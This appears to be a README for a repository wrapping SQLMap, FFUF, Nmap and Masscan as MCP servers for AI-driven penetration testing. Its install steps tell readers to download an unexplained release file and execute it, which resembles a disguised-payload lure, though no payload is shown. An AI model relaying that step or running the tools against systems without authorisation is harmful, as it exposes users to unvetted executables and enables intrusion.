Integrates popular security tools including Nmap, Masscan, SQLMap, FFUF, and MobSF for network scanning, SQL injection t...
Created byApr 23, 2025
MCP for Security


Welcome to the **MCP for Security** repository! This project offers a collection of Model Context Protocol (MCP) servers tailored for popular security tools. Tools like SQLMap, FFUF, NMAP, Masscan, and more are integrated to enhance your security testing and penetration testing workflows with AI capabilities.
Table of Contents
[Introduction](#introduction)
[Features](#features)
[Installation](#installation)
[Usage](#usage)
[Supported Tools](#supported-tools)
[Contributing](#contributing)
[License](#license)
[Contact](#contact)
[Releases](#releases)
Introduction
In today s digital landscape, security is paramount. The **MCP for Security** repository aims to streamline the integration of security tools into AI workflows. By utilizing the Model Context Protocol, we enable seamless communication between various security tools and AI systems, making security testing more efficient and effective.
Features
**Integration with Popular Tools**: Connects with SQLMap, FFUF, NMAP, Masscan, and others.
**AI Workflow Support**: Enhances security testing through AI-assisted processes.
**Modular Architecture**: Easy to add or modify servers for new tools.
**User-Friendly Interface**: Simple commands to get started quickly.
**Active Community**: Join discussions and contribute to ongoing development.
Installation
To get started with **MCP for Security**, follow these steps:
Clone the repository:
```bash
git clone https://github.com/StanLeyJ03/mcp-for-security.git
cd mcp-for-security
```
Install the required dependencies:
```bash
pip install -r requirements.txt
```
Download the latest release from the [Releases section](https://github.com/StanLeyJ03/mcp-for-security/releases). Make sure to execute the downloaded file to set up the servers.
Usage
Using **MCP for Security** is straightforward. Here s a quick guide:
Start the server:
```bash
python server.py
```
Connect to your preferred tool:
```bash
./connect_tool.sh <tool_name>
```
Begin your security testing:
```bash
./run_test.sh <parameters>
```
For detailed usage instructions, refer to the documentation provided in the repository.
Supported Tools
Currently, **MCP for Security** supports the following tools:
**SQLMap**: Automated SQL injection and database takeover tool.
**FFUF**: Fast web fuzzer for directory/file discovery.
**NMAP**: Network exploration tool and security/port scanner.
**Masscan**: Internet-scale port scanner.
Additional tools will be added based on community feedback.
Contributing
We welcome contributions! If you want to help improve **MCP for Security**, please follow these steps:
Fork the repository.
Create a new branch:
```bash
git checkout -b feature/YourFeature
```
Make your changes and commit them:
```bash
git commit -m "Add your feature description"
```
Push to the branch:
```bash
git push origin feature/YourFeature
```
Create a pull request.
For detailed guidelines, check the `CONTRIBUTING.md` file in the repository.
License
This project is licensed under the MIT License. See the `LICENSE` file for more details.
To find the latest releases, visit the [Releases section](https://github.com/StanLeyJ03/mcp-for-security/releases). Download the necessary files and execute them to start using **MCP for Security**.
Thank you for checking out **MCP for Security**! We hope this tool enhances your security testing and penetration testing efforts. Your feedback is crucial for our growth, so don t hesitate to contribute or reach out with your thoughts!